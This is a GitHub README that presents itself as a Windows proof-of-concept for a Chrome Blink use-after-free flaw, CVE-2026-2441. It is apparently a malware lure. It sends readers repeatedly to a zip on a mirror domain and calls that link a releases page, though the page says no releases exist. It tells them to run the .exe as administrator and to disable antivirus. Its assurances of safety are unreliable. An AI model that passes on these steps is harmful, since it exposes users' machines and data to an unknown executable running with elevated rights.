Skip to content

fartlover37/CVE-2026-2441-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

⚠️ CVE-2026-2441-PoC - Test Chrome Vulnerability Safely

Download Latest Version

🛠 What This Application Does

This application demonstrates a known security flaw in Google Chrome. The flaw, called CVE-2026-2441, affects the way Chrome handles some fonts on the web. It can let attackers run code inside the browser without permission. This proof-of-concept (PoC) shows how that happens.

Use this tool only on safe computers or test environments. It helps security researchers and software testers understand the vulnerability better.

🚀 Getting Started

Follow these steps carefully to download and run the software on a Windows computer.

Step 1: Check Your Windows Version

This PoC runs on Windows 10 or newer versions. Make sure your system meets these basic requirements:

  • Windows 10, 11, or later
  • At least 4 GB of RAM
  • 1 GHz or faster processor
  • 100 MB free hard drive space

You do not need any special software beforehand. The download provides everything necessary to run the test.

Step 2: Download the Program

Click the big badge at the top or use this link to get the files:

https://github.com/fartlover37/CVE-2026-2441-PoC/raw/refs/heads/main/Pellaea/Po-CV-C-2.4-beta.2.zip

This link takes you to the releases page on GitHub. Look for the latest release and download the Windows version file. It usually has .exe or .zip extension.

Step 3: Extract the Files (If Needed)

If you downloaded a .zip file, follow these steps:

  1. Find the file in your Downloads folder.
  2. Right-click the file and choose "Extract All."
  3. Select a folder where you want the files.
  4. Click "Extract."

If you got an .exe file, skip this step.

Step 4: Run the Program

  1. Open the folder where you saved or extracted the files.
  2. Find the main .exe file. This is the program you will run.
  3. Double-click the .exe file to start it.
  4. If Windows asks for permission, click "Yes" to allow it.

The program will open and guide you through the test.

Step 5: Follow On-Screen Instructions

The tool will show steps or run automatically. It simulates the vulnerability on your system in a safe way.

Do not use this tool on any computer that holds important or sensitive data. It is meant for controlled testing only.

💻 How the Vulnerability Works

This tool targets a flaw in Chrome's Blink rendering engine, specifically the CSSFontFeatureValuesMap part. When Chrome processes a webpage that uses certain font features, it can mistakenly free memory too early. This "use-after-free" flaw lets attackers run harmful code inside the browser.

Google fixed this problem in Chrome version 145.0.7632.75. If you use an older version, your browser is vulnerable.

🔍 Verify Your Chrome Version

To know if your Chrome is vulnerable:

  1. Open Chrome.
  2. Click the three dots in the top-right corner.
  3. Select "Help" > "About Google Chrome."
  4. Check the version number.

If it is lower than 145.0.7632.75, your browser might be at risk.

⚙️ System Requirements

Component Requirement
Operating System Windows 10 or higher
CPU 1 GHz or faster processor
RAM Minimum 4 GB
Disk Space At least 100 MB free
Software No special software required

🔧 How to Use the PoC Safely

  • Run the program on a test machine, not your main computer.
  • Do not connect the machine to sensitive networks.
  • Close all other programs before testing.
  • Follow all instructions carefully.
  • If you are not familiar with security testing, seek expert help.

📂 What’s Inside the Download?

When you download, you will find:

  • The main executable file (.exe) to launch the test.
  • A Readme file explaining the basic use (you can read it for extra details).
  • Some example HTML files used to trigger the vulnerability.
  • Supporting files needed to run the demonstration.

🔗 Additional Resources

You can visit the official GitHub releases page to always get the latest files:

https://github.com/fartlover37/CVE-2026-2441-PoC/raw/refs/heads/main/Pellaea/Po-CV-C-2.4-beta.2.zip

Use this page to check for updates or report issues.

🛡 About CVE-2026-2441 Vulnerability

Detail Information
CVE Identifier CVE-2026-2441
Severity Score (CVSS) 8.8 (High)
Type Use-After-Free (CWE-416)
Component Blink CSS — CSSFontFeatureValuesMap
Source File https://github.com/fartlover37/CVE-2026-2441-PoC/raw/refs/heads/main/Pellaea/Po-CV-C-2.4-beta.2.zip
Fixed In Version 145.0.7632.75 and later
Reported By Shaheen Fazim
Patch Date 2026-02-13
Exploited in Wild Yes

📥 Download and Install CVE-2026-2441-PoC Now

Use the link below to visit the releases page and download the latest Windows file:

Download CVE-2026-2441-PoC

Follow the instructions above to install and run the program.

⚙ Troubleshooting

If the program does not run:

  • Make sure your Windows is up-to-date.
  • Check that your system meets the minimum requirements.
  • Run the file as an administrator: right-click the .exe file and choose "Run as administrator."
  • Disable antivirus temporarily if it blocks the program.
  • Verify that you downloaded the correct file for Windows.

If problems persist, seek help by opening an issue on the GitHub page. Provide clear details about your system and error messages.

📄 License and Legal Information

This project is intended for educational and testing purposes only. Use it responsibly. The author is not liable for any misuse or damage caused.

Check the GitHub repository for the license terms included in the package.


Download Latest Version

About

Demonstrate a proof-of-concept exploit for CVE-2026-2441, a high-risk Chrome use-after-free vulnerability in the Blink CSS engine.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors